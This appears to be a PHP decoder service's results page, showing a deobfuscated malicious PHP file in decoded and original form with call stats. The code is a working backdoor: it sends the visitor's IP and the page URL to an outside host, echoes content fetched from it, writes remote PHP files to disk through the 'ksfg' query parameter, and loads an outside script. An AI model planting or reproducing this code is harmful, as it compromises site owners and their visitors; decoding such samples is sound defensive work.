Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTT..

Decoded Output download

<?php 
function GetIP() 
{ 
    if (getenv("HTTP_CLIENT_IP")) { 
        $ip = getenv("HTTP_CLIENT_IP"); 
    } elseif (getenv("HTTP_X_FORWARDED_FOR")) { 
        $ip = getenv("HTTP_X_FORWARDED_FOR"); 
        if (strstr($ip, ',')) { 
            $tmp = explode(',', $ip); 
            $ip = trim($tmp[0]); 
        } 
    } else { 
        $ip = getenv("REMOTE_ADDR"); 
    } 
    return $ip; 
} 
$x = base64_decode('aHR0cHM6Ly93d3cudHJpYnVubmV3cy5jb20=') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); 
if (function_exists('curl_init')) { 
    $ch = @curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $x); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
    $gitt = curl_exec($ch); 
    curl_close($ch); 
    if ($gitt == false) { 
        @$gitt = file_get_contents($x); 
    } 
} elseif (function_exists('file_get_contents')) { 
    @$gitt = file_get_contents($x); 
} 
?><?php 
    error_reporting(0); 
    $s = 'https://tribunnews.com'; 
    $host = str_replace('www.', '', @$_SERVER['HTTP_HOST']); 
    // $x = $s.'l-'.base64_encode($host); 
    $x = $s . '/index.php'; 
    // echo $host; 
 
    if (function_exists('curl_init')) { 
        $ch = @curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $x); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
        $gitt = curl_exec($ch); 
        curl_close($ch); 
        if ($gitt == false) { 
            @$gitt = file_get_contents($x); 
        } 
    } elseif (function_exists('file_get_contents')) { 
        @$gitt = file_get_contents($x); 
    } 
    echo $gitt; 
 
    if (isset($_GET['ksfg'])) { 
        $f = fopen($_GET['ksfg'] . '.php', 'a'); 
        fwrite($f, file_get_contents($s . 's-' . $_GET['ksfg'])); 
        fclose($f); 
    } 
    echo '<!DOCTYPE html!>'; 
    ?> 
</marquee> 
<script src=http://expoilt.com/ccb.js></script>

Did this file decode correctly?

Original Code

<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } elseif (getenv("HTTP_X_FORWARDED_FOR")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
        if (strstr($ip, ',')) {
            $tmp = explode(',', $ip);
            $ip = trim($tmp[0]);
        }
    } else {
        $ip = getenv("REMOTE_ADDR");
    }
    return $ip;
}
$x = base64_decode('aHR0cHM6Ly93d3cudHJpYnVubmV3cy5jb20=') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
if (function_exists('curl_init')) {
    $ch = @curl_init();
    curl_setopt($ch, CURLOPT_URL, $x);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $gitt = curl_exec($ch);
    curl_close($ch);
    if ($gitt == false) {
        @$gitt = file_get_contents($x);
    }
} elseif (function_exists('file_get_contents')) {
    @$gitt = file_get_contents($x);
}
?><?php
    error_reporting(0);
    $s = 'https://tribunnews.com';
    $host = str_replace('www.', '', @$_SERVER['HTTP_HOST']);
    // $x = $s.'l-'.base64_encode($host);
    $x = $s . '/index.php';
    // echo $host;

    if (function_exists('curl_init')) {
        $ch = @curl_init();
        curl_setopt($ch, CURLOPT_URL, $x);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $gitt = curl_exec($ch);
        curl_close($ch);
        if ($gitt == false) {
            @$gitt = file_get_contents($x);
        }
    } elseif (function_exists('file_get_contents')) {
        @$gitt = file_get_contents($x);
    }
    echo $gitt;

    if (isset($_GET['ksfg'])) {
        $f = fopen($_GET['ksfg'] . '.php', 'a');
        fwrite($f, file_get_contents($s . 's-' . $_GET['ksfg']));
        fclose($f);
    }
    echo '<!DOCTYPE html!>';
    ?>
</marquee>
<script src=http://expoilt.com/ccb.js></script>

Function Calls

GetIP 1
getenv 1
base64_decode 1

Variables

None

Stats

MD5 07ba6160cd0a9b08aeecb97d47512b3b
Eval Count 0
Decode Time 70 ms